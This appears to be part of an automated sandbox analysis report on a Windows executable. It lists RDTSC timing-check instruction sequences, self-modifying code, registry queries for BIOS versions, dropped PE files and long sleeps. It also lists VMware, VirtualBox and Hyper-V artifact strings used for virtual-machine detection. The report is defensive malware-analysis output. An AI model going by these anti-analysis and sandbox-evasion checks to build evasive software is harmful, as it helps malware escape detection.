Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4DA0E2F second address: 4DA0E35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D40C3F second address: 4D40C5F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4C05015A5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D40C5F second address: 4D40C72 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4C0C3E16Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D40C72 second address: 4D40CA0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4C05015A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF4C050159Dh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D61708 second address: 4D6171B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 mov ebx, 2E1DCDF4h 0x0000000a popad 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D6171B second address: 4D6172F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4C05015A0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D6172F second address: 4D61735 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D61735 second address: 4D61746 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+04h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D61746 second address: 4D6174C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D6174C second address: 4D61752 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D61752 second address: 4D6177F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push dword ptr [ebp+0Ch] 0x0000000b jmp 00007FF4C0C3E16Bh 0x00000010 push dword ptr [ebp+08h] 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FF4C0C3E170h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D6177F second address: 4D6178E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4C050159Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D6178E second address: 4D61794 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D61794 second address: 4D61798 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4DA00EF second address: 4DA0164 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF4C0C3E16Fh 0x00000009 add ax, 1E5Eh 0x0000000e jmp 00007FF4C0C3E179h 0x00000013 popfd 0x00000014 mov ecx, 4C259F27h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d jmp 00007FF4C0C3E16Dh 0x00000022 xchg eax, ebp 0x00000023 jmp 00007FF4C0C3E16Eh 0x00000028 mov ebp, esp 0x0000002a jmp 00007FF4C0C3E170h 0x0000002f pop ebp 0x00000030 push eax 0x00000031 push edx 0x00000032 pushad 0x00000033 mov edi, 27F2AAD0h 0x00000038 mov esi, edx 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4DA0164 second address: 4DA016A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4DA016A second address: 4DA016E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4DA016E second address: 4DA0172 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4DA003D second address: 4DA0057 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, di 0x00000006 movsx ebx, cx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c xchg eax, ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FF4C0C3E16Bh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4DA0057 second address: 4DA00A0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4C05015A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FF4C050159Ch 0x00000012 xor eax, 4E6205A8h 0x00000018 jmp 00007FF4C050159Bh 0x0000001d popfd 0x0000001e popad 0x0000001f pop ebp 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 mov al, 12h 0x00000025 mov cl, dl 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4DA00A0 second address: 4D40C3F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4C0C3E175h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp dword ptr [74E5155Ch] 0x0000000f mov edi, edi 0x00000011 push ebp 0x00000012 mov ebp, esp 0x00000014 mov ecx, dword ptr fs:[00000018h] 0x0000001b mov eax, dword ptr [ebp+08h] 0x0000001e mov dword ptr [ecx+34h], 00000000h 0x00000025 cmp eax, 40h 0x00000028 jnc 00007FF4C0C3E16Dh 0x0000002a mov eax, dword ptr [ecx+eax*4+00000E10h] 0x00000031 pop ebp 0x00000032 retn 0004h 0x00000035 test eax, eax 0x00000037 je 00007FF4C0C3E183h 0x00000039 mov eax, dword ptr [00432010h] 0x0000003e cmp eax, FFFFFFFFh 0x00000041 je 00007FF4C0C3E179h 0x00000043 mov esi, 0042F218h 0x00000048 push esi 0x00000049 call 00007FF4C557D42Ah 0x0000004e mov edi, edi 0x00000050 jmp 00007FF4C0C3E170h 0x00000055 xchg eax, ebp 0x00000056 jmp 00007FF4C0C3E170h 0x0000005b push eax 0x0000005c push eax 0x0000005d push edx 0x0000005e pushad 0x0000005f mov cx, BDE3h 0x00000063 mov si, 553Fh 0x00000067 popad 0x00000068 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4DA02AF second address: 4DA02B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4DA02B5 second address: 4DA02B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4DA02B9 second address: 4DA0306 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4C050159Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FF4C05015A2h 0x00000013 add si, 3478h 0x00000018 jmp 00007FF4C050159Bh 0x0000001d popfd 0x0000001e popad 0x0000001f xchg eax, ebp 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 jmp 00007FF4C05015A0h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4DA0306 second address: 4DA030C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4DA030C second address: 4DA031D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, bx 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov dl, al 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4DA0D69 second address: 4DA0DD7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, EEB6h 0x00000007 pushfd 0x00000008 jmp 00007FF4C0C3E177h 0x0000000d sub eax, 0DB9473Eh 0x00000013 jmp 00007FF4C0C3E179h 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov ebp, esp 0x0000001e jmp 00007FF4C0C3E16Eh 0x00000023 mov eax, dword ptr [ebp+08h] 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007FF4C0C3E177h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4DA0CA9 second address: 4DA0CC6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4C05015A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4DA0BAE second address: 4DA0C2C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, bx 0x00000006 mov dx, BE36h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push ebx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007FF4C0C3E178h 0x00000015 sub cx, 9D58h 0x0000001a jmp 00007FF4C0C3E16Bh 0x0000001f popfd 0x00000020 pushfd 0x00000021 jmp 00007FF4C0C3E178h 0x00000026 add si, A7B8h 0x0000002b jmp 00007FF4C0C3E16Bh 0x00000030 popfd 0x00000031 popad 0x00000032 mov dword ptr [esp], ebp 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007FF4C0C3E175h 0x0000003c rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4DB01D0 second address: 4DB01D4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4DB01D4 second address: 4DB01DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4DB01DA second address: 4DB021E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, edi 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FF4C05015A0h 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 mov di, si 0x00000013 pushfd 0x00000014 jmp 00007FF4C050159Ah 0x00000019 xor esi, 113FA1F8h 0x0000001f jmp 00007FF4C050159Bh 0x00000024 popfd 0x00000025 popad 0x00000026 mov ebp, esp 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4DB021E second address: 4DB0224 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4DB00A3 second address: 4DB00A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4DB00A7 second address: 4DB00AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4DC07EA second address: 4DC07F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4DC07F0 second address: 4DC07F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4DC065D second address: 4DC0663 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4DC0663 second address: 4DC0667 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4DC0667 second address: 4DC067E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF4C050159Ah 0x00000012 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4DC067E second address: 4DC068D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4C0C3E16Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4DC068D second address: 4DC06EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF4C050159Fh 0x00000009 xor si, 3D5Eh 0x0000000e jmp 00007FF4C05015A9h 0x00000013 popfd 0x00000014 mov bx, ax 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a mov dword ptr [esp], ebp 0x0000001d pushad 0x0000001e jmp 00007FF4C05015A8h 0x00000023 mov ecx, 08D8C221h 0x00000028 popad 0x00000029 mov ebp, esp 0x0000002b pushad 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D409C7 second address: 4D409CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D409CB second address: 4D409D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D409D1 second address: 4D40A18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FF4C0C3E173h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007FF4C0C3E176h 0x00000011 push eax 0x00000012 jmp 00007FF4C0C3E16Bh 0x00000017 xchg eax, ebp 0x00000018 pushad 0x00000019 mov bl, ah 0x0000001b push eax 0x0000001c push edx 0x0000001d mov ebx, 6B0E4C82h 0x00000022 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D40A18 second address: 4D40A36 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ebp, esp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FF4C05015A1h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D40A36 second address: 4D40A4B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4C0C3E171h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D40A4B second address: 4D40A78 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4C05015A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ecx, dword ptr [ebp+08h] 0x0000000c jmp 00007FF4C050159Eh 0x00000011 or eax, FFFFFFFFh 0x00000014 pushad 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D40A78 second address: 4D40AC9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 mov ax, C89Fh 0x0000000b popad 0x0000000c lock xadd dword ptr [ecx], eax 0x00000010 jmp 00007FF4C0C3E172h 0x00000015 dec eax 0x00000016 pushad 0x00000017 jmp 00007FF4C0C3E16Eh 0x0000001c popad 0x0000001d pop ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007FF4C0C3E179h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D40AC9 second address: 4D40ADE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4C05015A1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D40ADE second address: 4D40AE3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4DA036D second address: 4DA03A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4C05015A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c jmp 00007FF4C050159Eh 0x00000011 mov ebp, esp 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 mov dx, FFA0h 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D7089D second address: 4D708AC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4C0C3E16Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D708AC second address: 4D708FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FF4C05015A9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov bl, D7h 0x0000000d popad 0x0000000e xchg eax, ebp 0x0000000f jmp 00007FF4C05015A5h 0x00000014 mov ebp, esp 0x00000016 jmp 00007FF4C050159Eh 0x0000001b pop ebp 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRDTSC instruction interceptor: First address: 4D708FB second address: 4D708FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeSpecial instruction interceptor: First address: 81CA12 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeSpecial instruction interceptor: First address: 81CB01 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeSpecial instruction interceptor: First address: 9C64A8 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeSpecial instruction interceptor: First address: 9C4ECD instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeSpecial instruction interceptor: First address: 9D7690 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeSpecial instruction interceptor: First address: 81C9A7 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeCode function: 0_2_0081C98C rdtsc 0_2_0081C98C
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\soft[1]Jump to dropped file
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\eEwf3ZG9fBWYD5w\Y-Cleaner.exeJump to dropped file
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\eEwf3ZG9fBWYD5w\Bunifu_UI_v1.5.3.dllJump to dropped file
Source: C:\Users\user\Desktop\dI3n4LSHB7.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\dll[1]Jump to dropped file
Source: C:\Users\user\Desktop\dI3n4LSHB7.exe TID: 6784Thread sleep count: 99 > 30Jump to behavior
Source: C:\Users\user\Desktop\dI3n4LSHB7.exe TID: 6860Thread sleep time: -42021s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\dI3n4LSHB7.exe TID: 6864Thread sleep time: -36018s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\dI3n4LSHB7.exe TID: 6784Thread sleep count: 94 > 30Jump to behavior
Source: C:\Users\user\Desktop\dI3n4LSHB7.exe TID: 6784Thread sleep count: 83 > 30Jump to behavior
Source: C:\Users\user\Desktop\dI3n4LSHB7.exe TID: 6784Thread sleep count: 101 > 30Jump to behavior
Source: C:\Users\user\Desktop\dI3n4LSHB7.exe TID: 6784Thread sleep count: 91 > 30Jump to behavior
Source: C:\Users\user\Desktop\dI3n4LSHB7.exe TID: 6784Thread sleep count: 89 > 30Jump to behavior
Source: C:\Users\user\Desktop\dI3n4LSHB7.exe TID: 6832Thread sleep time: -34017s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\dI3n4LSHB7.exe TID: 6880Thread sleep time: -40020s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\dI3n4LSHB7.exe TID: 6904Thread sleep time: -40020s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\dI3n4LSHB7.exe TID: 6884Thread sleep time: -48024s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\dI3n4LSHB7.exe TID: 6828Thread sleep time: -38019s >= -30000sJump to behavior
Source: dI3n4LSHB7.exe, dI3n4LSHB7.exe, 00000000.00000002.2420658294.00000000009A4000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Amcache.hve.7.drBinary or memory string: VMware
Source: Amcache.hve.7.drBinary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.7.drBinary or memory string: vmci.syshbin
Source: Amcache.hve.7.drBinary or memory string: VMware, Inc.
Source: Amcache.hve.7.drBinary or memory string: VMware20,1hbin@
Source: Amcache.hve.7.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.7.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.7.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: dI3n4LSHB7.exe, 00000000.00000003.1875573218.000000000547B000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2054547195.000000000547B000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.2004146869.000000000547B000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.1978929182.000000000547B000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000002.2421379275.0000000000E37000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.1953645739.000000000547B000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000002.2423473843.000000000547B000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.1850067777.000000000547B000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.1927437039.000000000547B000.00000004.00000020.00020000.00000000.sdmp, dI3n4LSHB7.exe, 00000000.00000003.1824890347.000000000547B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
Source: Amcache.hve.7.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.7.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.7.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.7.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.7.drBinary or memory string: vmci.sys
Source: Amcache.hve.7.drBinary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.7.drBinary or memory string: vmci.syshbin`
Source: Amcache.hve.7.drBinary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.7.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.7.drBinary or memory string: VMware20,1
Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.7.drBinary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.7.drBinary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.7.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.7.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.7.drBinary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
Source: Amcache.hve.7.drBinary or memory string: VMware PCI VMCI Bus Device
Source: Amcache.hve.7.drBinary or memory string: VMware VMCI Bus Device
Source: Amcache.hve.7.drBinary or memory string: VMware Virtual RAM
